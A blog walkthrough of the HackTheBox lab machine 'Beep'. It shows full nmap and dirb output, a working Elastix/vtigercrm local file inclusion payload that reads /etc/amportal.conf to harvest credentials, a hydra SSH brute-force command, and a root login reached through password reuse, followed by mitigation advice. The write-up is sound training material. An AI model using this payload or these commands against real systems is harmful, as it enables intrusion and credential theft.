Thumbnail: gravatar

HackTheBox 'Beep' writeup

by on under writeups
8 minute read

 

A Quick HackTheBox (HTB) walkthrough of ‘beep’

 


Host Information    
Hostname Operating System HTB Difficulty Rating
Beep Linux Easy

 

view all writeups here

 

enumeration

 

initial nmap

─➤  sudo nmap -sS -sV -p- -O -oA beep 10.10.10.7
[sudo] password for initinfosec: 
Starting Nmap 7.80SVN ( https://nmap.org ) at 2019-12-27 14:22 CST
Nmap scan report for 10.10.10.7
Host is up (0.045s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
25/tcp    open  smtp       Postfix smtpd
80/tcp    open  http       Apache httpd 2.2.3
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
878/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80SVN%E=4%D=12/27%OT=22%CT=1%CU=32404%PV=Y%DS=2%DC=I%G=Y%TM=5E0
OS:66903%P=x86_64-unknown-linux-gnu)SEQ(SP=CA%GCD=1%ISR=CF%TI=Z%CI=Z%II=I%T
OS:S=A)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=
OS:M54DST11NW7%O6=M54DST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=1
OS:6A0)ECN(R=Y%DF=Y%T=40%W=16D0%O=M54DNNSNW7%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M54DST11
OS:NW7%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40
OS:%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q
OS:=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164
OS:%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 228.31 seconds

So looks like there’s a lot of stuff open. MySQL, and SSH may be of special interest, but let’s go ahead and enumerate the http server contents with dirb.

initial dirb

╭─initinfosec@theMachine ~/writeups/HTB/beep/enumeration  
╰─➤  cat beep_port80_results.txt 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

OUTPUT_FILE: beep_port80_results.txt
START_TIME: Fri Dec 27 15:03:14 2019
URL_BASE: http://10.10.10.7/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.7/ ----
(!) WARNING: NOT_FOUND[] not stable, unable to determine correct URLs {30X}.
    (Try using FineTunning: '-f')

-----------------
END_TIME: Fri Dec 27 15:03:15 2019
DOWNLOADED: 0 - FOUND: 0

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

OUTPUT_FILE: beep_port80_results.txt
START_TIME: Fri Dec 27 15:08:07 2019
URL_BASE: https://10.10.10.7/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: https://10.10.10.7/ ----
==> DIRECTORY: https://10.10.10.7/admin/
+ https://10.10.10.7/cgi-bin/ (CODE:403|SIZE:286)
==> DIRECTORY: https://10.10.10.7/configs/
+ https://10.10.10.7/favicon.ico (CODE:200|SIZE:894)
==> DIRECTORY: https://10.10.10.7/help/
==> DIRECTORY: https://10.10.10.7/images/
+ https://10.10.10.7/index.php (CODE:200|SIZE:1785)
==> DIRECTORY: https://10.10.10.7/lang/
==> DIRECTORY: https://10.10.10.7/libs/
==> DIRECTORY: https://10.10.10.7/mail/
==> DIRECTORY: https://10.10.10.7/modules/
==> DIRECTORY: https://10.10.10.7/panel/
+ https://10.10.10.7/robots.txt (CODE:200|SIZE:28)
==> DIRECTORY: https://10.10.10.7/static/
==> DIRECTORY: https://10.10.10.7/themes/
==> DIRECTORY: https://10.10.10.7/var/

---- Entering directory: https://10.10.10.7/admin/ ----
==> DIRECTORY: https://10.10.10.7/admin/common/
+ https://10.10.10.7/admin/favicon.ico (CODE:200|SIZE:318)
==> DIRECTORY: https://10.10.10.7/admin/images/
+ https://10.10.10.7/admin/index.php (CODE:302|SIZE:0)
+ https://10.10.10.7/admin/modules (CODE:403|SIZE:291)
+ https://10.10.10.7/admin/views (CODE:403|SIZE:289)

---- Entering directory: https://10.10.10.7/configs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/help/ ----
==> DIRECTORY: https://10.10.10.7/help/content/
+ https://10.10.10.7/help/index.php (CODE:200|SIZE:346)

---- Entering directory: https://10.10.10.7/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/lang/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/libs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/mail/ ----
==> DIRECTORY: https://10.10.10.7/mail/bin/
+ https://10.10.10.7/mail/config (CODE:403|SIZE:289)
+ https://10.10.10.7/mail/index.php (CODE:200|SIZE:2649)
==> DIRECTORY: https://10.10.10.7/mail/installer/
+ https://10.10.10.7/mail/LICENSE (CODE:200|SIZE:17987)
+ https://10.10.10.7/mail/logs (CODE:403|SIZE:287)
==> DIRECTORY: https://10.10.10.7/mail/plugins/
==> DIRECTORY: https://10.10.10.7/mail/program/
+ https://10.10.10.7/mail/README (CODE:200|SIZE:1856)
+ https://10.10.10.7/mail/robots.txt (CODE:200|SIZE:26)
==> DIRECTORY: https://10.10.10.7/mail/skins/
==> DIRECTORY: https://10.10.10.7/mail/SQL/
+ https://10.10.10.7/mail/temp (CODE:403|SIZE:287)

---- Entering directory: https://10.10.10.7/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/panel/ ----
+ https://10.10.10.7/panel/FAQ (CODE:200|SIZE:2449)
==> DIRECTORY: https://10.10.10.7/panel/flash/
+ https://10.10.10.7/panel/index.php (CODE:200|SIZE:1065)
==> DIRECTORY: https://10.10.10.7/panel/init/
+ https://10.10.10.7/panel/README (CODE:200|SIZE:7421)
+ https://10.10.10.7/panel/TODO (CODE:200|SIZE:241)

---- Entering directory: https://10.10.10.7/static/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/var/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/admin/common/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/help/content/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/mail/bin/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/mail/installer/ ----
==> DIRECTORY: https://10.10.10.7/mail/installer/images/
+ https://10.10.10.7/mail/installer/index.php (CODE:302|SIZE:0)

---- Entering directory: https://10.10.10.7/mail/plugins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/mail/program/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/mail/skins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/mail/SQL/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/panel/flash/ ----
+ https://10.10.10.7/panel/flash/crossdomain.xml (CODE:200|SIZE:221)
+ https://10.10.10.7/panel/flash/index.html (CODE:200|SIZE:1089)

---- Entering directory: https://10.10.10.7/panel/init/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/mail/installer/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Fri Dec 27 16:30:12 2019
DOWNLOADED: 32284 - FOUND: 23

Alright, so it looks like there’s an admin panel for elastix (a PBX dashboard from the looks of it) upon going to the URI. Trying to go to an admin page yields a login prompt. After trying a few elastix default creds I searched for, I decided to try to crack the password to the admin panel before pursuing other routes.

After giving burp and hydra a shot, I tentatively concluded that the login page maybe be doing some kind of page refresh or HTTP redirect on incorrect login, rather than giving an invalid login message or some error text back. I stepped through the page with burp forwarding several times, and failed to find some key text to pass to hydra to inform it that the attempt was invalid and to move on to the next credential to try.

I probably could have confirmed (or invalidated) the page refresh/HTTP redirect theory somehow, but decided for the time being to not spend too much time on this route.

 

further enuemration for exploitation

 

I then decided to search searchploit for elastix.

One of the results was an LFI, which gave a config page with creds in it.

The URI For the LFI was:

#LFI Exploit: 10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

It was not very clean on the browser, so i wget’d it to a file, and grep’d for a password for the admin user:

cat LFI_results| grep -i pass

which gave me the login for the page.

I split the file into a wordlist of usersnames and credentials from the file to try and log in to the SSH service.

sudo hydra -V -L list -P list 10.10.10.7 ssh

 

For some reason, that did not find the password (I think my hydra install in Arch is borked at the time of this box), but picking a password entry manually (the same one for the elastix login page) allowed me to login to ssh as root. From there, I grabbed the user and root flags.

Pretty easy and simple. Looks like we didn’t have to go down other avenues such as MySQL.

 

Advised Mititgations

Were this a client asessment, I would probably advise the follow to mitigate risk of system compromise (based on my cursory findings on the box):

  • Patch Elastix to mitigate the LFI (and other) vulnerabilities.
  • Change the SSH login for root to be distinctly different from the Elastix admin page. Better yet, diaallow root login over SSH (if is possible/not needed)

 

Conclusion/Learning takeaways

Nothing in the box really surprised me overall, as it was pretty simple. It does reinforce the fact, however, that I need to get more familiar with Burp Suite.

 

That’s all for now, thanks for reading, hope it was useful.

 

~@initinfosec

hackthebox, HTB, writeups, walkthrough, hacking, pentest, OSCP prep
comments powered by Disqus